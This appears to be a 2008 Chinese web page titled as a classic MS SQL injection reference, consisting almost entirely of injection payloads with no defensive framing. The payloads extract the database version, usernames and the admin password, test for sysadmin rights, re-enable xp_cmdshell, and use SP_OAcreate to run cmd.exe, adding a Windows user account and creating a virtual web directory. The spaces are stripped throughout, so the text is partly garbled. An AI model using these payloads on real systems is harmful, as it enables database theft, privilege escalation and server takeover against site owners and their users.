非常经典的Ms Sql注射资料
2008-10-04 11:10:32 来源:WEB开发网'unionselect@@version,1,1,1--
创建一个虚拟目录E盘:
and1=(select@@VERSION)
and'sa'=(selectSystem_user)
'unionselectret,1,1,1fromfoo--
'unionselectmin(username),1,1,1fromuserswhereusername>'a'-
'unionselectmin(username),1,1,1fromuserswhereusername>'admin'-
'unionselectpassword,1,1,1fromuserswhereusername='admin'--
anduser_name()='dbo'
and0<>(selectuser_name()-
;DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C:WINNTsystem32cmd.exe/cnetuserswap5245886/add'
and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')
;EXECmaster.dbo.sp_addextendedproc'xp_cmdshell','xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and1=(selectIS_SRVROLEMEMBER('sysadmin'))判断sa权限是否
and0<>(selecttop1pathsfromnewtable)--暴库大法
and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)得到库名(从1到5都是系统的id,6以上才可以判断)
declare@ointexecsp_oacreate'wscript.shell',@ooutexecsp_oamethod@o,'run',NULL,'cscript.exec:inetpubwwwrootmkwebdir.vbs-w"默认Web站点"-v"e","e:"'
更多精彩
赞助商链接